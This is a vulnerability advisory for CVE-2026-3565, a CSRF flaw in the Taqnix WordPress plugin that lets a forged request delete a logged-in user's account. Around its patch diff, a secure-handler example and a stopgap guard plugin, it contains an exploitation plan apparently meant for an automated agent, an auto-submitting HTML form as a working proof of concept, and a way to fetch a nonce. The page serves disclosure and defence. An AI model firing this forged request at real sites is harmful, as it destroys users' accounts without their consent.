CVE-2026-3565

Taqnix <= 1.0.3 - Cross-Site Request Forgery to Account Deletion via 'taqnix_delete_my_account' AJAX Action

Type: Cross-Site Request Forgery (CSRF)
CVSS Score: 4.3
Severity: medium
Patched in: 1.0.4
Time to patch: 1d

Description

The Taqnix plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to a missing nonce verification in the taqnix_delete_my_account() function, where the check_ajax_referer() call is explicitly commented out on line 883. This makes it possible for unauthenticated attackers to trick a logged-in non-administrator user into deleting their own account via a forged request granted they can trick the user into performing an action such as clicking a link or visiting a malicious page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <=1.0.3
Published: April 23, 2026
Last updated: April 24, 2026
Affected plugin: taqnix

What Changed in the Fix

Changes introduced in v1.0.4


Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-3565 (Taqnix Account Deletion CSRF)

1. Vulnerability Summary

The Taqnix plugin for WordPress (versions <= 1.0.3) contains a Cross-Site Request Forgery (CSRF) vulnerability in its account deletion functionality. The AJAX handler taqnix_delete_my_account() fails to perform nonce verification because the check_ajax_referer() call is explicitly commented out (specifically on line 883 of the source file containing the user account logic). This allows an attacker to trick a logged-in user into unknowingly deleting their own WordPress account by inducing them to visit a malicious page or click a link.

2. Attack Vector Analysis

  • AJAX Action: taqnix_delete_my_account
  • Endpoint: admin-ajax.php (typically /wp-admin/admin-ajax.php)
  • Method: POST (though admin-ajax.php may also process GET)
  • Parameters:
    • action: taqnix_delete_my_account
  • Authentication Level: Required (The victim must be a logged-in user, typically a non-administrator like a Subscriber or Customer).
  • Preconditions: The victim must have an active session on the target WordPress site.

3. Code Flow

  1. Action Registration: The plugin likely registers the AJAX handler for logged-in users:
    add_action('wp_ajax_taqnix_delete_my_account', array($this, 'taqnix_delete_my_account'));
  2. Handler Execution: When a request is sent to admin-ajax.php with the action taqnix_delete_my_account, WordPress executes the taqnix_delete_my_account() function.
  3. Missing Check: Inside taqnix_delete_my_account() (line 883), the security check is commented out:
    // check_ajax_referer( 'taqnix_action', 'security' );
  4. Sink: The function proceeds to identify the current user via get_current_user_id() and invokes account deletion logic (likely wp_delete_user()), causing the authenticated user's account to be removed from the database.
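The handler shape the code flow above describes, written the way a plugin author should write it, as an added example that is not Taqnix's code: the nonce is minted when the page script is enqueued, sent by that script in the 'security' field, and verified by check_ajax_referer() before anything destructive runs. The class, hook, script handle and JS object names are assumptions; the nonce action 'taqnix_action' and the request key 'security' are the ones the advisory's diff shows.

```php
<?php
/**
 * Added example (not Taqnix's code): a self-service "delete my account"
 * AJAX handler with the CSRF protection the advisory says 1.0.3 lacked.
 * Class name, hook name, script handle and JS object name are assumptions.
 */
class Example_Account_Deletion {

    const NONCE_ACTION = 'taqnix_action'; // nonce action name from the advisory's diff
    const NONCE_FIELD  = 'security';      // request key the handler checks

    public function __construct() {
        // Registered for logged-in users only. There is deliberately no
        // wp_ajax_nopriv_ hook: anonymous callers have no account to delete.
        add_action( 'wp_ajax_example_delete_my_account', array( $this, 'delete_my_account' ) );
        add_action( 'wp_enqueue_scripts', array( $this, 'enqueue' ) );
    }

    public function enqueue() {
        if ( ! is_user_logged_in() ) {
            return;
        }
        // The nonce is created server-side for this user and session and handed
        // to the page's own script; a page on another origin cannot read it.
        wp_enqueue_script( 'example-account', plugins_url( 'js/account.js', __FILE__ ), array( 'jquery' ), '1.0', true );
        wp_localize_script( 'example-account', 'exampleAccount', array(
            'ajaxUrl' => admin_url( 'admin-ajax.php' ),
            'nonce'   => wp_create_nonce( self::NONCE_ACTION ),
        ) );
    }

    public function delete_my_account() {
        // 1. CSRF check. With the default third argument (die = true) this ends
        //    the request with -1 / HTTP 403 when the nonce is missing or wrong,
        //    so nothing below runs for a forged cross-site request.
        check_ajax_referer( self::NONCE_ACTION, self::NONCE_FIELD );

        // 2. Authentication check, kept explicit even though wp_ajax_ implies it.
        $user_id = get_current_user_id();
        if ( 0 === $user_id ) {
            wp_send_json_error( array( 'message' => 'Not logged in.' ), 401 );
        }

        // 3. Design choice: this self-service path never removes a privileged
        //    account; administrators are managed from the Users screen instead.
        if ( user_can( $user_id, 'manage_options' ) ) {
            wp_send_json_error( array( 'message' => 'Administrators cannot be deleted here.' ), 403 );
        }

        // 4. Require an explicit confirmation value so a stray call from the
        //    page's own script is not enough either.
        $confirm = isset( $_POST['confirm'] ) ? sanitize_text_field( wp_unslash( $_POST['confirm'] ) ) : '';
        if ( 'DELETE' !== $confirm ) {
            wp_send_json_error( array( 'message' => 'Confirmation missing.' ), 400 );
        }

        // wp_delete_user() lives in wp-admin/includes/user.php. admin-ajax.php
        // loads it, but guard anyway so the method is safe to call elsewhere.
        if ( ! function_exists( 'wp_delete_user' ) ) {
            require_once ABSPATH . 'wp-admin/includes/user.php';
        }

        if ( wp_delete_user( $user_id ) ) {
            wp_clear_auth_cookie(); // the session no longer belongs to anyone
            wp_send_json_success( array( 'redirect' => home_url( '/' ) ) );
        }
        wp_send_json_error( array( 'message' => 'Deletion failed.' ), 500 );
    }
}

new Example_Account_Deletion();
```

The page script (js/account.js, assumed) POSTs `action=example_delete_my_account`, `security=<exampleAccount.nonce>` and `confirm=DELETE` to `exampleAccount.ajaxUrl`. A cross-site page can auto-submit a form with the action name, as the PoC on this page does, but it cannot obtain the nonce, so the request dies at step 1 before get_current_user_id() or wp_delete_user() is reached. The capability and confirmation checks are defence in depth: a nonce proves the request came from the site's own page, not that the action was sensible.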

4. Nonce Acquisition Strategy

According to the vulnerability description, no nonce is required for this exploit because the check is explicitly commented out.

However, if a specific test environment has been patched or if the agent needs to verify the registration of the action, nonces for other Taqnix actions are localized or available via the taqnix_nonce AJAX action defined in public/class-taqnix-config 3.03.50 PM.php:

  • AJAX Action: taqnix_nonce
  • Function: get_taqnix_nonce() -> get_nonce()
  • JS Variable (Localised): Often found in taqnix_action key if the plugin enqueues its config.

Confirmation Method:

  1. Navigate to the homepage or a product page as a logged-in user.
  2. Check for localized scripts using browser_eval:
    browser_eval("window.taqnix_nonce || window.taqnix_config")
  3. If the vulnerability exists as described, attempts to call the taqnix_delete_my_account action without a security or _wpnonce parameter will succeed.

5. Exploitation Strategy

The goal is to demonstrate that an unauthenticated attacker can cause a logged-in user to delete their account.

Step 1: Verification (Direct Request)

As a logged-in victim (e.g., user victim_user), send a POST request directly to the AJAX endpoint.

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body: action=taqnix_delete_my_account

Step 2: CSRF PoC Generation

Create an HTML page that auto-submits a form to the target endpoint.

<html>
  <body>
    <h1>Processing...</h1>
    <form id="csrf-form" action="http://localhost:8080/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="taqnix_delete_my_account" />
    </form>
    <script>
      document.getElementById('csrf-form').submit();
    </script>
  </body>
</html>

6. Test Data Setup

  1. Create Victim User:
    wp user create victim_user victim@example.com --role=subscriber --user_pass=password123
  2. Plugin Activation: Ensure Taqnix is active.
  3. Login: The agent must simulate the victim being logged in (using browser_navigate and browser_type to log in as victim_user).

7. Expected Results

  • Response: The server should return a JSON success message (e.g., {"success":true} or a 200 OK response with specific plugin output).
  • Behavior: The victim_user account should be deleted from the WordPress database.

8. Verification Steps

  1. Check User Status: After the exploit request, attempt to verify the user exists via WP-CLI:
    wp user get victim_user
  2. Expected Outcome: The command should return an error: Error: Invalid user ID, email or login: 'victim_user'.
  3. Database Check: Verify the wp_users table directly:
    wp db query "SELECT ID, user_login FROM wp_users WHERE user_login = 'victim_user';"
    (Expected: No results).

9. Alternative Approaches

If the plugin logic requires specific parameters (like a confirmation flag) that were not mentioned in the description, analyze the taqnix_delete_my_account handler (if found during the exploit attempt) for additional required POST keys.

If a nonce is actually required in the specific version being tested (despite the description), use the taqnix_nonce action to retrieve a valid nonce:

  1. http_request(url=".../wp-admin/admin-ajax.php?action=taqnix_nonce", method="POST")
  2. Extract the taqnix_action nonce from the JSON response.
  3. Include security=[nonce] in the account deletion payload. (Note: This would change the vulnerability from CSRF to a simple Lack of Capability Check/Nonce Leak).

Research Findings

Static analysis — not yet PoC-verified

Summary

The Taqnix plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) because the 'taqnix_delete_my_account' AJAX handler fails to perform nonce verification. This allows attackers to trick a logged-in user into unknowingly deleting their own WordPress account by inducing them to click a malicious link or visit a crafted page.

Vulnerable Code

// From public/class-taqnix-user.php (inferred based on file listing and vulnerability description)

// Registration of the AJAX handler (logged-in users only; no wp_ajax_nopriv_ variant)
add_action('wp_ajax_taqnix_delete_my_account', array($this, 'taqnix_delete_my_account'));

// ...

public function taqnix_delete_my_account() {
    // Line 883: the nonce check is commented out, so any request carrying the
    // victim's session cookie reaches the deletion logic below
    // check_ajax_referer( 'taqnix_action', 'security' );

    $user_id = get_current_user_id();
    // Proceed to delete user account logic...
}

Security Fix

--- public/class-taqnix-user.php
+++ public/class-taqnix-user.php
@@ -880,7 +883,7 @@
-        // check_ajax_referer( 'taqnix_action', 'security' );
+        check_ajax_referer( 'taqnix_action', 'security' );
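Review bot: the hunk shows only the one changed line and none of the seven context lines its header `@@ -880,7 +883,7 @@` promises, so the three-line shift between the old and new file, and what follows the re-enabled check, cannot be confirmed from this diff; please post the full hunk. Two points to verify alongside it: the client script that calls this action must now send a `security` field produced by `wp_create_nonce( 'taqnix_action' )`, otherwise legitimate self-deletion fails with the -1/403 response `check_ajax_referer()` produces by default; and since a valid nonce only proves the request came from the site's own page, the handler should still guard the sink, for example by refusing when `get_current_user_id()` is 0 or the user holds an administrative capability, rather than relying on the nonce alone.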

Exploit Outline

The exploit methodology involves creating a CSRF vector targeting the WordPress AJAX endpoint.

  1. Target Endpoint: /wp-admin/admin-ajax.php
  2. Method: POST
  3. Parameters:
    • 'action': 'taqnix_delete_my_account'
  4. Payload Delivery: The attacker creates a simple HTML form that auto-submits via JavaScript to the target endpoint.
  5. Requirements: The victim must be a logged-in WordPress user. Because the security nonce check ('check_ajax_referer') is explicitly commented out in version 1.0.3, no valid 'security' or '_wpnonce' parameter is required to successfully trigger the account deletion logic.
  6. Impact: Once the victim's browser executes the request, WordPress identifies the user session, and the plugin proceeds to delete the user record associated with 'get_current_user_id()'.
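For a site that cannot update to 1.0.4 immediately, the forged request described above can be stopped in front of the plugin. The following mu-plugin is an added example, not Taqnix's code: it hooks the same wp_ajax_taqnix_delete_my_account action at an earlier priority and rejects requests that carry neither a valid 'taqnix_action' nonce in the 'security' field (the names the advisory's diff uses) nor a same-site Origin or Referer header. The file name, function names, log prefix, and the assumption that the plugin registers its handler at WordPress's default priority 10 are mine; the decision logic is kept in a pure function so it can be reasoned about without WordPress loaded.

```php
<?php
/**
 * Plugin Name: Example Taqnix CSRF Guard (mu-plugin)
 *
 * Added example, not Taqnix's code. Stopgap for installs still on <= 1.0.3:
 * runs before the plugin's own handler on the same AJAX action and refuses
 * requests that carry neither a valid nonce nor a same-site source header.
 * Updating to 1.0.4 is the real fix; remove this file once that is done.
 */

/**
 * Decide whether a request to the deletion action should be allowed.
 *
 * @param bool|null   $nonce_valid true/false if a nonce was sent, null if none was
 * @param string|null $origin      Origin header, or null
 * @param string|null $referer     Referer header, or null
 * @param string      $site_host   host part of home_url()
 * @return array{0: bool, 1: string} [allowed, reason]
 */
function example_csrf_guard_decide( $nonce_valid, $origin, $referer, $site_host ) {
    if ( true === $nonce_valid ) {
        return array( true, 'valid nonce' );
    }
    if ( false === $nonce_valid ) {
        // A nonce was sent but is wrong or expired: treat as forged, no fallback.
        return array( false, 'invalid nonce' );
    }
    // No nonce at all (the 1.0.3 client may not send one): fall back to the
    // browser-set source headers, which a cross-site page cannot control.
    // Prefer Origin; Referer may be stripped by a referrer policy.
    $source = ( null !== $origin && '' !== $origin ) ? $origin : $referer;
    if ( null === $source || '' === $source ) {
        return array( false, 'no nonce and no Origin/Referer' );
    }
    // "Origin: null" (sandboxed frames, some redirects) yields no host and is rejected.
    $host = parse_url( $source, PHP_URL_HOST );
    if ( ! is_string( $host ) || 0 !== strcasecmp( $host, $site_host ) ) {
        return array( false, 'cross-site source: ' . $source );
    }
    return array( true, 'same-site source' );
}

function example_csrf_guard() {
    $nonce_valid = null;
    if ( isset( $_REQUEST['security'] ) ) {
        $nonce_valid = (bool) wp_verify_nonce(
            sanitize_text_field( wp_unslash( $_REQUEST['security'] ) ),
            'taqnix_action'
        );
    }
    $origin  = isset( $_SERVER['HTTP_ORIGIN'] ) ? $_SERVER['HTTP_ORIGIN'] : null;
    $referer = isset( $_SERVER['HTTP_REFERER'] ) ? $_SERVER['HTTP_REFERER'] : null;
    $site    = (string) parse_url( home_url(), PHP_URL_HOST );

    list( $allowed, $reason ) = example_csrf_guard_decide( $nonce_valid, $origin, $referer, $site );

    if ( ! $allowed ) {
        // One log line per blocked attempt: who was targeted, from where, and why.
        error_log( sprintf(
            'example-csrf-guard: blocked taqnix_delete_my_account for user %d from %s (%s)',
            get_current_user_id(),
            isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown',
            $reason
        ) );
        wp_send_json_error( array( 'message' => 'Request rejected.' ), 403 ); // exits
    }
}

// Priority 1 runs before the plugin's handler, assumed registered at the default 10.
add_action( 'wp_ajax_taqnix_delete_my_account', 'example_csrf_guard', 1 );
```

Drop the file into wp-content/mu-plugins/ and it loads without activation. The auto-submitting form from the PoC above arrives with the attacker's page as Origin, so it is rejected and logged before the plugin's handler runs; a request from the site's own page passes on its same-site Origin even if the 1.0.3 script sends no nonce. The trade-off is that a legitimate request arriving with neither header is also blocked, which is the right failure mode for a temporary guard on a destructive action. The error_log lines are also a detection signal: more than a handful for the same user or source IP is worth looking at.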
